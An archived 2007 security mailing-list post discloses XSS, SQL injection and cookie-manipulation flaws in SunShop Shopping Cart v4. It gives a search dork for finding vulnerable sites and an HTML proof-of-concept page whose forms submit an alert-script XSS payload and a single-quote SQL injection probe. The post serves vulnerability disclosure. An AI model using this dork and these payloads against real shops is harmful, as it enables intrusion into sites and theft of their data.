Security
 
Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
 
User Name:
Password:
Remember me
Go Back   Web Development Archives Mailing Lists Security

Reply
Add This Thread To:
  Del.icio.us   Digg   Google   Spurl   Blink   Furl   Simpy   Y! MyWeb 
Thread Tools Search this Thread Display Modes
 
Unread Web Development Archives Sponsor:
  #1  
Old May 7th, 2007, 01:00 PM
john
Guest
Dev Archives Newbie (0 - 499 posts)
 
Posts: n/a  
Time spent in forums:
Reputation Power:
SunShop (v4) Multiple Vulnerabilities

<!--

SunShop (v4) Multiple Vulnerabilities


Cookie Manipulation Vulnerability


File: index.php
Variable: l (PST)

Cross-Site Scripting Vulnerability


File: index.php
Variable: l (PST)

SQL Injection Vulnerabilities


File: index.php
Variable: c (GET)

File: index.php
Variables: quantity[x:xx] (PST)


Vulnerable: SunShop Shopping Cart v4
Google d0rk: "Powered by SunShop Shopping Cart"

John Martinelli
john (AT) martinelli (DOT) com
http://john-martinelli.com

May 5th, 2007

!

<html>
<head><title>SunShop (v4) Multiple Vulnerabilities</title><body>

<center><br><br><font size=4>SunShop (v4) Multiple Vulnerabilities</font><br>
<font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br>
<br>Google d0rk: <a href="%%22">"Powered by SunShop Shopping Cart"</a>

</font><br>

<br><br>
<form action="" method="post">
<input name="l" size=75 value="<script %0a%0d>alert(1);</script>">
<input name="remove[0]" type="hidden" value="off">
<input name="quantity[0:49]" type="hidden" value="1">
<input name="remove[1]" type="hidden" value="off">
<input name="quantity[1:50]" type="hidden" value="1">
<input name="remove[2]" type="hidden" value="off">
<input name="quantity[2:55]" type="hidden" value="1">
<input name="remove[3]" type="hidden" value="off">
<input name="quantity[3:42]" type="hidden" value="1">
<input name="remove[4]" type="hidden" value="off">
<input name="quantity[4:51]" type="hidden" value="1">
<input name="coupon" type="hidden" value="email (AT) address (DOT) com">
<input type=submit value="Execute Attack on variable 'l' in index.php" class="button">
</form>

<br>
<form action="" method="post">
<input name="c" size=75 value="'">
<input name="pg" type="hidden" value="1">
<input name="l" type="hidden" value="product_list">
<input type=submit value="Execute SQL Injection on variable 'c' in index.php" class="button">
</form>


</body></html>

Reply With Quote
Reply

Viewing: Web Development Archives Mailing Lists Security > SunShop (v4) Multiple Vulnerabilities


Thread Tools  Search this Thread 
Search this Thread:

Advanced Search
Display Modes  Rate This Thread 
Rate This Thread:


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are Off
[IMG] code is On
HTML code is Off
View Your Warnings | New Posts | Latest Threads | Shoutbox
Forum Jump


Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
  
 





© 2003-2009 by Developer Shed. All rights reserved. DS Cluster 6 Hosted by Hostway
Stay green...Green IT